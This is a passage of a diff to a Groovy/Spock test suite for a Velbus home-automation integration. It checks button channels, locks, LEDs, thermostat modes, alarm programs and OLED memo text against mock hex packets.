-            assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
-            assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH4") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH5") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH6") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH7") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("CH8") == InputProcessor.ChannelState.RELEASED
-        }
+    then: "the button press packet should have been sent to the message processor"
+    conditions.eventually {
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.PRESSED
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F F8 32 04 00 20 00 00 A3 04 00 00 00 00")
+      }
     }
 
-    def "VMB1TS Test"() {
+    when: "a button release is written to the device"
+    network.writeProperty(48, "CH22", InputProcessor.ChannelState.RELEASED.name())
 
-        when: "A device property value consumer is registered for device address 5 (VMB1TS)"
-        Object tempCurrent;
-        network.addPropertyValueConsumer(5, "TEMP_CURRENT", {
-            newValue -> tempCurrent = newValue;
-        })
-        VelbusDevice device = network.getDevice(5)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB1TS
-            assert device.getBaseAddress() == 5
-        }
-
-        and: "the device property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("TEMP_CURRENT") == 29.9
-            assert device.getPropertyValue("TEMP_MIN") == 19.3
-            assert device.getPropertyValue("TEMP_MAX") == 30.3
-            assert device.getPropertyValue("HEATER") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("BOOST") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("PUMP") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("COOLER") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_ALARM1") == InputProcessor.ChannelState.RELEASED
-            assert device.getPropertyValue("TEMP_ALARM2") == InputProcessor.ChannelState.PRESSED
-            assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 5.0
-            assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
-            assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
-        }
+    then: "the button release packet should have been sent to the message processor"
+    conditions.eventually {
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00")
+      }
     }
+
+    when: "an input channel is locked for 1s"
+    device.writeProperty("CH8_LOCK", 1d)
+
+    then: "the channel should become locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH8_LOCKED")
+    }
+
+    and: "the channel should become unlocked again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 00 D4 04"))
+    conditions.eventually {
+      assert !device.getPropertyValue("CH8_LOCKED")
+    }
+
+    when: "an input channel is locked indefinitely"
+    device.writeProperty("CH8_LOCK", -1d)
+
+    then: "the channel should become locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH8_LOCKED")
+    }
+
+    when: "the channel lock is cancelled"
+    device.writeProperty("CH8_LOCK", 0d)
+
+    then: "the channel should become unlocked again"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 00 D4 04"))
+    conditions.eventually {
+      assert !device.getPropertyValue("CH8_LOCKED")
+    }
+
+    and: "eventually the message queue should become empty"
+    conditions.eventually {
+      assert network.messageQueue.size() == 0
+    }
+
+    when: "a channel LED is set to on"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("CH1_LED", FeatureProcessor.LedState.ON.name())
+
+    then: "the LED should be on"
+    conditions.eventually {
+      device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.ON
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F FB 30 02 F6 01 CD 04 00 00 00 00 00 00")
+      }
+    }
+
+    when: "a channel LED is set to slow"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("CH1_LED", FeatureProcessor.LedState.SLOW.name())
+
+    then: "the LED should be on slow"
+    conditions.eventually {
+      device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.SLOW
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F FB 30 02 F7 01 CC 04 00 00 00 00 00 00")
+      }
+    }
+
+    when: "a channel LED is set to fast"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("CH1_LED", FeatureProcessor.LedState.FAST.name())
+
+    then: "the LED should be on fast"
+    conditions.eventually {
+      device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F FB 30 02 F8 01 CB 04 00 00 00 00 00 00")
+      }
+    }
+
+    when: "a channel LED is set to very fast"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("CH1_LED", FeatureProcessor.LedState.VERYFAST.name())
+
+    then: "the LED should be on very fast"
+    conditions.eventually {
+      device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.VERYFAST
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F FB 30 02 F9 01 CA 04 00 00 00 00 00 00")
+      }
+    }
+
+    when: "a channel LED is set to off"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("CH1_LED", FeatureProcessor.LedState.OFF.name())
+
+    then: "the LED should be off"
+    conditions.eventually {
+      device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F FB 30 02 F5 01 CE 04 00 00 00 00 00 00")
+      }
+    }
+
+    when: "A device property value consumer is registered for device address 10 (VMB7IN)"
+    Object vmb7InChannel1
+    network.addPropertyValueConsumer(10, "CH1", { newValue ->
+      vmb7InChannel1 = newValue
+    })
+    device = network.getDevice(10)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB7IN
+      assert device.getBaseAddress() == 10
+
+      // Check the processor shows this device as supporting 7 channels
+      assert inputButtonProcessor.getMaxChannelNumber(device.getDeviceType()) == 7
+
+      // Check channels are enabled
+      1.upto(7, {
+        assert inputButtonProcessor.isChannelEnabled(device, it)
+      })
+    }
+
+    and: "the input button property values should be initialised"
+    conditions.eventually {
+      1.upto(7, {
+        if (it == 1) {
+          // Channels with enabled counter shows as pressed
+          assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.PRESSED
+        } else {
+          assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
+        }
+        assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
+        assert !device.getPropertyValue("CH" + it + "_LOCKED")
+        assert device.getPropertyValue("CH" + it + "_ENABLED")
+      })
+    }
+
+    when: "a button is long pressed on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 00 02 E9 04"))
+
+    then: "the property value should change to LONG_PRESSED"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.LONG_PRESSED
+    }
+
+    when: "the button is released on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 02 00 E9 04"))
+
+    then: "the property value should return to RELEASED"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.RELEASED
+    }
+
+    when: "a button is pressed on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 02 00 00 E9 04"))
+
+    then: "the property value should change to PRESSED"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
+    }
+
+    when: "the button is released on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 0A 04 00 00 02 00 E9 04"))
+
+    then: "the property value should return to RELEASED"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.RELEASED
+    }
+
+    and: "eventually the message queue should become empty"
+    conditions.eventually {
+      assert network.messageQueue.size() == 0
+    }
+
+    when: "a button press is written to the device"
+    messageProcessor.sentMessages.clear()
+    network.writeProperty(10, "CH3", InputProcessor.ChannelState.PRESSED.name())
+
+    then: "the button press packet should have been sent to the message processor"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.PRESSED
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F F8 0A 04 00 04 00 00 E7 04 00 00 00 00")
+      }
+    }
+
+    when: "a button release is written to the device"
+    network.writeProperty(10, "CH3", InputProcessor.ChannelState.RELEASED.name())
+
+    then: "the button release packet should have been sent to the message processor"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
+      if (network.client == messageProcessor) {
+        assert messageProcessor.sentMessages.contains("0F F8 0A 04 00 00 04 00 E7 04 00 00 00 00")
+      }
+    }
+  }
+
+  def "Thermostat Processor Test"() {
+
+    given: "the thermostat processor"
+    def thermostatProcessor = (ThermostatProcessor)VelbusDeviceType.VMBGPOD.getFeatureProcessors().find {
+      it.getClass() == ThermostatProcessor.class
+    }
+    VelbusDevice device = null
+
+    when: "A device property value consumer is registered for a VMBGP1 device with the thermostat enabled"
+    Object gp1CurrentTemp
+    network.addPropertyValueConsumer(1, "TEMP_CURRENT", { newValue ->
+      gp1CurrentTemp = newValue
+    })
+    device = network.getDevice(1)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGP1
+      assert device.getBaseAddress() == 1
+      assert device.getSubAddresses()[0] == 2
+      assert device.getSubAddresses()[1] == 255
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 255
+
+      // Check the processor shows the thermostat as enabled
+      assert thermostatProcessor.isThermostatEnabled(device)
+    }
+
+    when: "A device property value consumer is registered for a VMBGP1 device with the thermostat disabled"
+    network.addPropertyValueConsumer(3, "TEMP_CURRENT", { newValue ->
+      gp1CurrentTemp = newValue
+    })
+    device = network.getDevice(3)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGP1
+      assert device.getBaseAddress() == 3
+      assert device.getSubAddresses()[0] == 255
+      assert device.getSubAddresses()[1] == 255
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 255
+
+      // Check the processor shows the thermostat as disabled
+      assert !thermostatProcessor.isThermostatEnabled(device)
+    }
+
+    when: "A device property value consumer is registered for a VMBGPOD device with the thermostat enabled"
+    Object gpodHeatNight
+    network.addPropertyValueConsumer(48, "TEMP_TARGET_HEAT_NIGHT", { newValue ->
+      gpodHeatNight = newValue
+    })
+    device = network.getDevice(48)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
+      assert device.getBaseAddress() == 48
+      assert device.getSubAddresses()[0] == 49
+      assert device.getSubAddresses()[1] == 50
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 64
+
+      // Check the processor shows the thermostat as enabled
+      assert thermostatProcessor.isThermostatEnabled(device)
+    }
+
+    and: "the thermostat values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("HEATER") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("BOOST") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("PUMP") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("COOLER") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_ALARM1") == InputProcessor.ChannelState.PRESSED
+      assert device.getPropertyValue("TEMP_ALARM2") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_ALARM3") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_ALARM4") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
+      assert device.getPropertyValue("TEMP_CURRENT") == 28.0d
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 12d
+      assert device.getPropertyValue("TEMP_TARGET_COOL_COMFORT") == 21d
+      assert device.getPropertyValue("TEMP_TARGET_COOL_DAY") == 23d
+      assert device.getPropertyValue("TEMP_TARGET_COOL_NIGHT") == 26d
+      assert device.getPropertyValue("TEMP_TARGET_COOL_SAFE") == 36d
+      assert device.getPropertyValue("TEMP_TARGET_HEAT_COMFORT") == 25d
+      assert device.getPropertyValue("TEMP_TARGET_HEAT_DAY") == 22d
+      assert device.getPropertyValue("TEMP_TARGET_HEAT_NIGHT") == 16d
+      assert device.getPropertyValue("TEMP_TARGET_HEAT_SAFE") == 12d
+    }
+
+    when: "we update the heat night temperature property"
+    device.writeProperty("TEMP_TARGET_HEAT_NIGHT", 20.5)
+
+    then: "the heat night temp should be updated"
+    conditions.eventually {
+      assert gpodHeatNight == 20.5d
+    }
+
+    when: "we receive a temperature sensor value"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 E6 3F 60 30 A0 3F 80 AB 04"))
+
+    then: "the temperature value should be resolved to 0.1 degrees"
+    assert device.getPropertyValue("TEMP_CURRENT") == 31.7d
+
+    when: "we set thermostat state to disabled"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
+    }
+
+    when: "we set the thermostat state to manual"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
+    }
+
+    when: "we set the thermostat state to normal"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+    }
+
+    when: "we set the thermostat state to manual"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
+    }
+
+    when: "we set the thermostat state to disabled"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
+    }
+
+    when: "we set the thermostat state to normal"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+    }
+
+    when: "we set the thermostat mode to heat comfort with timer"
+    device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
+
+    then: "the state and mode should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
+    }
+
+    when: "we set the thermostat state to disabled"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.DISABLED.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.DISABLED
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
+    }
+
+    when: "we set the thermostat mode to heat comfort with timer"
+    device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
+
+    then: "the state and mode should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
+    }
+
+    when: "we set the thermostat state to manual"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.MANUAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
+    }
+
+    when: "we set the thermostat mode to heat comfort with timer"
+    device.writeProperty("TEMP_MODE_HEAT_COMFORT_MINS", 1d)
+
+    then: "the state and mode should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.TIMER
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 25d
+    }
+
+    when: "we set the thermostat state to normal"
+    device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_COMFORT
+    }
+
+    when: "we switch back to HEAT SAFE"
+    device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.HEAT_SAFE.name())
+
+    then: "the state should update"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
+    }
+
+    when: "we set temp mode to COOL DAY"
+    device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.COOL_DAY.name())
+
+    then: "the current temp mode should change"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.COOL_DAY
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 23d
+    }
+
+    when: "we set temp mode to COOL COMFORT permanently"
+    // Set to COOL_COMFORT mode permanently
+    messageProcessor.mockPackets["0F FB 30 03 DB FF FF EA 04 00 00 00 00 00"] = ["0F FB 30 08 EA C2 00 1A 37 2A 00 00 97 04"]
+
+    device.writeProperty("TEMP_MODE_COOL_COMFORT_MINS", -1d)
+
+    then: "the current temp mode should change"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.MANUAL
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.COOL_COMFORT
+    }
+
+    cleanup: "Reset the heat night target temperature"
+    if (device != null) {
+      device.writeProperty("TEMP_TARGET_HEAT_NIGHT", 16d)
+      device.writeProperty("TEMP_STATE", ThermostatProcessor.TemperatureState.NORMAL.name())
+      device.writeProperty("TEMP_MODE", ThermostatProcessor.TemperatureMode.HEAT_SAFE.name())
+    }
+  }
+
+  def "Programs Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
+    Object gpodAlarm1WakeTime
+    network.addPropertyValueConsumer(48, "ALARM1_WAKE_TIME", { newValue ->
+      gpodAlarm1WakeTime = newValue
+    })
+    VelbusDevice device = network.getDevice(48)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
+      assert device.getBaseAddress() == 48
+      assert device.getSubAddresses()[0] == 49
+      assert device.getSubAddresses()[1] == 50
+      assert device.getSubAddresses()[2] == 255
+      assert device.getSubAddresses()[3] == 64
+    }
+
+    and: "the programs property values should be initialised"
+    conditions.eventually {
+      1.upto(24, {
+        def programStepsEnabled = it != 13
+        assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX) == programStepsEnabled
+      })
+
+      assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      assert !device.getPropertyValue("SUNRISE_ENABLED")
+      assert device.getPropertyValue("SUNSET_ENABLED")
+      assert device.getPropertyValue("ALARM1_ENABLED")
+      assert !device.getPropertyValue("ALARM2_ENABLED")
+      assert device.getPropertyValue("ALARM1_MASTER")
+      assert !device.getPropertyValue("ALARM2_MASTER")
+      assert device.getPropertyValue("ALARM1_WAKE_TIME").equals(gpodAlarm1WakeTime)
+      assert device.getPropertyValue("ALARM1_WAKE_TIME") == "16:00"
+      assert device.getPropertyValue("ALARM1_BED_TIME") == "22:00"
+      assert device.getPropertyValue("ALARM2_WAKE_TIME") == "08:00"
+      assert device.getPropertyValue("ALARM2_BED_TIME") == "23:00"
+      assert device.getPropertyValue("PROGRAM") == ProgramsProcessor.Program.SUMMER
+    }
+
+    when: "alarm 1 is disabled and alarm 2 is enabled"
+    device.writeProperty("ALARM1_ENABLED", false)
+    device.writeProperty("ALARM2_ENABLED", true)
+
+    then: "the alarms should update to match"
+    conditions.eventually {
+      assert !device.getPropertyValue("ALARM1_ENABLED")
+      assert device.getPropertyValue("ALARM2_ENABLED")
+    }
+
+    when: "sunrise is enabled and sunset disabled"
+    device.writeProperty("SUNRISE_ENABLED", true)
+    device.writeProperty("SUNSET_ENABLED", false)
+
+    then: "the alarms should update to match"
+    conditions.eventually {
+      assert device.getPropertyValue("SUNRISE_ENABLED")
+      assert !device.getPropertyValue("SUNSET_ENABLED")
+    }
+
+    when: "we enable program steps on channel 13"
+    device.writeProperty("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, true)
+
+    then: "channel 13 program steps should be enabled and all channel program steps should now show as enabled"
+    conditions.eventually {
+      assert device.getPropertyValue("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+    }
+
+    when: "all channel program steps are disabled for 1s"
+    device.writeProperty("ALL" + ProgramsProcessor.PROGRAM_STEPS_DISABLED_SECONDS_SUFFIX, 1d)
+
+    then: "all channels should show as disabled"
+    conditions.eventually {
+      assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      1.upto(24, {
+        assert !device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      })
+    }
+
+    when: "the module re-enables the channels"
+    // Note below packets only used when mock message procoessor is used by the VelbusNetwork
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"))
+
+    then: "all channels should show as enabled again"
+    conditions.eventually {
+      assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      1.upto(24, {
+        assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      })
+    }
+
+    when: "all channel 20 program steps are disabled for 1s"
+    device.writeProperty("CH20" + ProgramsProcessor.PROGRAM_STEPS_DISABLED_SECONDS_SUFFIX, 1d)
+
+    then: "only channel 20 should show as disabled"
+    conditions.eventually {
+      assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      1.upto(24, {
+        def programStepsEnabled = it != 20
+        assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX) == programStepsEnabled
+      })
+    }
+
+    when: "the module re-enables the channel"
+    // Note below packets only used when mock message procoessor is used by the VelbusNetwork
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"))
+
+    then: "all channels should show as enabled again"
+    conditions.eventually {
+      assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      1.upto(24, {
+        assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
+      })
+    }
+
+    when: "the current program is changed to winter"
+    device.writeProperty("PROGRAM", ProgramsProcessor.Program.WINTER.name())
+
+    then: "the program should update"
+    conditions.eventually {
+      assert device.getPropertyValue("PROGRAM") == ProgramsProcessor.Program.WINTER
+    }
+
+    when: "the master alarm 1 wake and sleep times are updated"
+    device.writeProperty("ALARM1_WAKE_TIME", "04:00")
+    device.writeProperty("ALARM1_BED_TIME", "20:00")
+
+    then: "the properties should update"
+    conditions.eventually {
+      assert device.getPropertyValue("ALARM1_WAKE_TIME") == "04:00"
+      assert device.getPropertyValue("ALARM1_BED_TIME") == "20:00"
+    }
+
+    cleanup: "return initial state"
+    if (device != null) {
+      device.writeProperty("ALARM1_ENABLED", true)
+      device.writeProperty("ALARM2_ENABLED", false)
+      device.writeProperty("SUNRISE_ENABLED", false)
+      device.writeProperty("SUNSET_ENABLED", true)
+      device.writeProperty("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, true)
+      device.writeProperty("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, false)
+      device.writeProperty("PROGRAM", ProgramsProcessor.Program.SUMMER.name())
+      device.writeProperty("ALARM1_WAKE_TIME", "16:00")
+      device.writeProperty("ALARM1_BED_TIME", "22:00")
+    }
+  }
+
+  def "OLED Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
+    Object gpodMemoText
+    network.addPropertyValueConsumer(48, "MEMO_TEXT", { newValue ->
+      gpodMemoText = newValue
+    })
+    VelbusDevice device = network.getDevice(48)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
+      assert device.getBaseAddress() == 48
+    }
+
+    and: "the OLED property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("MEMO_TEXT") == ""
+    }
+
+    and: "eventually the message queue should become empty"
+    conditions.eventually {
+      assert network.messageQueue.size() == 0
+    }
+
+    when: "some memo text is sent to the device"
+    def msg = "Hello world. This is a test message for the OLED panels to make sure they work:30"
+    messageProcessor.sentMessages.clear()
+    device.writeProperty("MEMO_TEXT", msg)
+
+    then: "the memo text property should contain the text and the correct packets should have been sent to the device"
+    if (network.client == messageProcessor) {
+      conditions.eventually {
+        assert device.getPropertyValue("MEMO_TEXT") == msg.substring(0, 62)
+        assert messageProcessor.sentMessages.size() >= 13
+        def firstPacketIndex = messageProcessor.sentMessages.indexOf("0F FB 30 08 AC 00 00 48 65 6C 6C 6F 1E 04")
+        assert firstPacketIndex >= 0
+        assert messageProcessor.sentMessages[firstPacketIndex + 1].toString() == "0F FB 30 08 AC 00 05 20 77 6F 72 6C 29 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 2].toString() == "0F FB 30 08 AC 00 0A 64 2E 20 54 68 9A 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 3].toString() == "0F FB 30 08 AC 00 0F 69 73 20 69 73 2B 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 4].toString() == "0F FB 30 08 AC 00 14 20 61 20 74 65 84 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 5].toString() == "0F FB 30 08 AC 00 19 73 74 20 6D 65 20 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 6].toString() == "0F FB 30 08 AC 00 1E 73 73 61 67 65 E1 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 7].toString() == "0F FB 30 08 AC 00 23 20 66 6F 72 20 68 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 8].toString() == "0F FB 30 08 AC 00 28 74 68 65 20 4F 3A 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 9].toString() == "0F FB 30 08 AC 00 2D 4C 45 44 20 70 80 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 10].toString() == "0F FB 30 08 AC 00 32 61 6E 65 6C 73 CD 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 11].toString() == "0F FB 30 08 AC 00 37 20 74 6F 20 6D 4B 04"
+        assert messageProcessor.sentMessages[firstPacketIndex + 12].toString() == "0F FB 30 06 AC 00 3C 61 6B 00 0C 04 00 00"
+      }
+    }
+
+    cleanup: "put the device state back"
+    if (device != null) {
+      device.writeProperty("MEMO_TEXT", "")
+    }
+  }
+
+  def "Relay Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 81 (VMB1RYNO)"
